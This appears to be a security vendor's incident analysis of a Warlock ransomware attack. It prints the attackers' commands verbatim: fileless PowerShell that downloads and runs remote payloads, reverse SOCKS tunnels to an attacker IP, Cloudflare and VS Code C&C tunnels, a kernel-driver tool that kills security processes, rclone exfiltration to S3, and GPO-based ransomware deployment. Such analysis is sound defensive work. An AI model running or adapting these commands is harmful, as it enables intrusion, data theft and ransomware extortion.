Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack

Following initial access, the threat actors conducted extensive lateral movement using a combination of legitimate administration tools and credential abuse. As a result, the  threat actors gained control of the DC, reset the password of the built-in Administrator account, and subsequently added a domain user to the Domain Administrators group, indicating full domain-level compromise.

net user administrator <REDACTED>
net localgroup Administrators “<REDACTED>Desktop Admins” /ADD

PsExec

Lateral movement activity involving PsExec was observed through the execution of the PSEXESVC process and the presence of the artifact C:WindowsPSEXEC<REDACTED>.key. This step was consistent with remote command executions across the domain. Aside from the PsExec, several tools were used as secondary options for remote monitoring and control over the devices.

TightVNC

PsExec was used to execute commands that led to the installation of TightVNC via MSIEXEC execution with /i, enabling the download and installation of package from the remote location.

C:windowssystem32msiexec.exe /i hxxps[://www[.tightvnc[.com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit[.msi /q /norestart ADDLOCAL=Server SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=[REDACTED]  

PowerShell Remoting (PSRemoting)

Furthermore, PSRemoting, a built-in Windows feature for remote administration, was enabled and used to execute PowerShell commands on remote systems. 

C:windowsSystem32WindowsPowerShellv1.0powershell.exe “Enable-PSRemoting -Force -SkipNetworkProfileCheck”  

RDP Patcher/Wrapper

RDP Patcher enables the non-server Windows edition to have concurrent RDP sessions. Multiple sessions are allowed; thus, administrators are less likely to notice or disconnect an existing session preventing any detections.

Command-and-control

Tunneling mechanisms, C&C agents and several other tools were used to maintain persistence of the  threat actors and facilitate their communications within the private network.

Velociraptor

The  threat actors continued to abuse Velociraptor (version 0.73.4) as their primary C&C framework, repurposing the legitimate Digital Forensics and Incident Response (DFIR) tool for stealth. This activity is part of a consistent pattern of abusing dual-use tools, as previously documented by external researchers, wherein the group’s infrastructure has evolved from Velociraptor to include VS Code and Cloudflare Tunnel for C&C communications.

The Velociraptor installer was disguised as “v4.msi” and hosted on a Supabase storage:

C:WindowsSystem32msiexec.exe /q /i hxxps[://]vdfccjpnedujhrzscjtq[.]supabase[.]co/storage/v1/object/public/image/v4[.]msi

VS Code

Following installation, Velociraptor downloaded VS Code using an encoded PowerShell command: 

[“Invoke-WebRequest -Uri “https://vscode.download.prss.microsoft.com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip” -OutFile “C:\ProgramData\Microsoft\AppV\code.zip”n”]

We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern:

• Downloading remote bytes,
• Loading them directly into memory via [Reflection.Assembly]::Load(), and
• Executing them with .EntryPoint.Invoke().

Each execution supplied the same “4567” command-line argument to the entry point of the payload, thereby indicating that the payload was executed with a consistent and predefined runtime parameter across all runs.

[“n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData(‘hxxps://litter[.]catbox[.]moe/zqqxb3.txt’)).EntryPoint.Invoke($null, (, [string[]] (“4567″)))”]

[“[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData(‘hxxps://files[.]catbox[.]moe/wzsjlw.dll’)).EntryPoint.Invoke($null, (, [string[]] (“4567”))) “]

[“[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData(‘hxxps://litter[.]catbox[.]moe/uaw2gm.txt’)).EntryPoint.Invoke($null, (, [string[]] (“4567″))) n”]

A pivot from the referenced URLs/file names to VirusTotal showed that they pointed to wssocks.exe, a .NET payload designed for in-memory execution. This step aligned with the observed technique of downloading bytes directly and running them via Assembly.Load() and EntryPoint.Invoke() without writing to disk.

Cloudflare Tunnel

The commands below show the method by which the TA configured Cloudflare Tunnels for C&C communications. After installing Cloudflared via MSI, the attacker first registered it as a persistent Windows service using service install with a pre-configured token, ensuring the tunnel would survive reboots. The tunnel run –token command then authenticated the compromised machine to the attacker’s Cloudflare account and established a named tunnel. Approximately 50 minutes later, the attacker also created a quick tunnel using tunnel –url http://127.0.0.1:80, which exposes a local HTTP server through a Cloudflare-provided public URL, likely as a secondary access method to proxy traffic to the compromised SharePoint server.

Persistent service registration:  “C:Program Files (x86)cloudflaredcloudflared.exe” service install <TOKEN>

Named tunnel execution: “C:Program Files (x86)cloudflaredcloudflared.exe” tunnel run –token <TOKEN>

Quick tunnel (ad-hoc reverse proxy to local webserver): cloudflared.exe tunnel –url http://127.0.0.1:80

C&C Tunneling via VS Code CLI

The TA leveraged VS Code’s built-in tunneling capability to establish a covert C&C channel. By downloading the VS Code CLI and running it in tunnel service mode,  threat actors created a legitimate-looking connection that blends in with developer traffic.

Invoke-WebRequest -Uri “https://vscode.download.prss.microsoft.com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip” -OutFile “C:ProgramDataMicrosoftAppVcode.zip”
C:windowsdebugcode-insiders.exe” –verbose –cli-data-dir
C:Users[REDACTED].vscodecli tunnel service internal-run –log-to-file
C:Users[REDACTED].vscodeclitunnel-service.log

Yuze

We have identified the use of a new and lightweight open-source tunneling tool called Yuze by the  threat actors. This purely C-based tool is designed for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. The  threat actors executed Yuze using the commands below:

rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:80

rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:443

rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:53  (DNS port)

These commands establish a reverse proxy connection to the attacker’s external C&C server across multiple ports: HTTP (80), HTTPS (443), and DNS (53). The sequential port rotation also suggests the attacker was probing an open egress path through the victim’s firewall, with port 53 being a common target since it is typically permitted for DNS traffic. This addition to the toolkit of the TA demonstrates a continued shift toward leveraging stealthy and cross-platform utilities to maintain persistence and enable lateral movement.

Traffic analysis points to 198[.]13[.]158[.]193 as the primary C&C endpoint. This IP address is registered under blnwx[.]com, which provides services, such as Virtual Private Servers (VPS). Other reports have noted that multiple high-profile ransomware groups are using this same infrastructure for their secondary-stage operations.

In our previous report, the  threat actors renamed rclone.exe to TrendSecurity.exe to appear legitimate. In this incident, the file that was renamed to TrendSecurity.exe functioned as a loader that exploited the vulnerable NSecKrnl.sys driver to continuously terminate security processes. Through GPO deployment, the attackers systematically disabled all security software throughout the compromised environment.

The attack worked in two stages. First, the loader created a kernel driver service using the vulnerable NSecKrnl.sys driver:

sc create NSecKrnl binPath= “c:users[REDACTED]NSecKrnl.sys” type=filesys

Once the vulnerable driver is loaded, TrendSecurity.exe leveraged it to continuously terminate security product processes at the kernel level, thereby bypassing user-mode protections. Binary analysis revealed that the tool targeted over 30 processes across major security vendors, with a particular focus on TrendAI™ products:

Vendor	Targeted Processes
TrendAI™	Ntrtscan.exe, TmListen.exe, PccNTMon.exe, TMBMSRV.exe, TmCCSF.exe, TmExtIns.exe, TmWatchdog.exe, TmSSClient.exe, TmPfw.exe, TmProxy.exe, ds_monitor.exe, dsa.exe, dsvp.exe
CrowdStrike	CSFalconService.exe, csfalconservice.exe, CsFalconConnector.exe, CSFalconController.exe, CSFalconContainer.exe, CsScan.exe, CsScanCli.exe
Microsoft	MsMpEng.exe, MpCmdRun.exe, MpDefenderCoreService.exe, MpDlpService.exe
Symantec	ccSvcHst.exe, sepWscSvc64.exe

Table 1. Targeted processes

The NSec-Killer tool is publicly available at GitHub; however, the TA customized its implementation for this incident.

It’s important to note that these processes are protected by agent self-protection technology. This means that attempts to terminate them are automatically blocked, with immediate and high-fidelity alerts generated in the management console. This process provides defenders with a critical opportunity to detect and respond to tampering in real time.

The threat actors continue to use a renamed version of the legitimate tool rclone.exe (disguised as TrendFileSecurityCheck.exe) to exfiltrate data, a technique previously documented in their campaigns. By repurposing a widely trusted file synchronization utility, the threat actors aim to blend their data transfers with legitimate administrative or backup traffic. This approach evades simple signature-based detection and complicates behavioral analysis because the network activity of the tool may appear benign without deeper context.

The command below shows the  threat actors exfiltrating data from a targeted file share directly to an attacker-controlled S3 bucket:

TrendFileSecurityCheck.exe  copy \ REDACTEDREDACTED :s3:REDACTED/src  -P –include “*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,doc,xls,csv,ppt,pptx}” -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11 –max-age 500d –max-size 2000m

Impact: Ransomware Deployment via GPO

The threat actors weaponize Active Directory Group Policy for mass malware distribution. Ransomware components are staged in SYSVOL and NETLOGON shares, which automatically replicate to all DC and are accessible to all domain-joined systems:

[VICTIM-DOMAIN]SYSVOL[VICTIM-DOMAIN]scriptsrunrun.dll 

[VICTIM-DOMAIN]SYSVOL[VICTIM-DOMAIN]scriptsTrendTrendSecurity.exe 

[VICTIM-DC]netlogonrun.bat 

[VICTIM-DOMAIN]SysVol[VICTIM-DOMAIN]Policies{5810DB21-959D-45BD-AF4C-0228CEC3C46A}MachineScriptsStartupCentralStartup.cmd  

The deployment script copies the BYOVD tool from SYSVOL to the local system and executes it:

copy [VICTIM-DOMAIN]SYSVOL[VICTIM-DOMAIN]scriptsTrend* c:userspublic /y & start /B cmd /c “c:userspublicTrendSecurity.exe 2>nul || exit”  

This approach ensures malware deployment occurs automatically when systems boot or when Group Policy refreshes, thereby enabling rapid enterprise-wide infection without requiring individual system access.

The primary ransomware payload is run.dll, which exports a function named RunCryptor that performs the actual file encryption. The threat actors employed multiple execution methods to maximize encryption coverage.

Furthermore, the primary execution method uses rundll32.exe to invoke the RunCryptor export:

rundll32 c:userspublicrun.dll,RunCryptor

Alternative execution paths include running the standalone run.exe executable and directly calling the DLL from SYSVOL shares:

start /B cmd /c “c:userspublicrun.exe 2>nul || exit”

start /B cmd /c “rundll32 \[VICTIM-DOMAIN]SYSVOL[VICTIM-DOMAIN]scriptsrunrun.dll,RunCryptor 2>nul || exit”

Following encryption, the ransomware then drops a ransom note named lockdatareadme.txt on affected systems.

About Author